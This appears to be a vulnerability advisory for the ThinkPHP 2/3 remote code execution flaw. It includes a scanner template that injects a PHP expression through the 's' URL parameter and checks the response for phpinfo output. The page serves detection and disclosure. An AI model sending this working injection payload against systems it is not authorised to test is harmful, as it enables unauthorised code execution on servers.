thinkphp-2-rce: ThinkPHP 2/3 - Remote Code Execution

日期: 2025-08-01 | 影响软件: ThinkPHP 2 3 | POC: 已公开

漏洞描述

ThinkPHP 2.x and 3.0 in Lite mode are susceptible to remote code execution via the s parameter. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

PoC代码[已公开]

id: thinkphp-2-rce

info:
  name: ThinkPHP 2/3 - Remote Code Execution
  author: dr_set
  severity: critical
  description: ThinkPHP 2.x and 3.0 in Lite mode are susceptible to remote code execution via the s parameter. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
  metadata:
    max-request: 1
  tags: thinkphp,rce,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
          - "ThinkPHP"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206022fdc1e257905a276dae425708e83c3ce4dee7dd898d35416f57c3e31f27af022100cdc76f71d2ee2498a82b6e587c4dcc2317a951d3276fb6d1199b408193fa274e:922c64590222798bb761d5b6d8e72950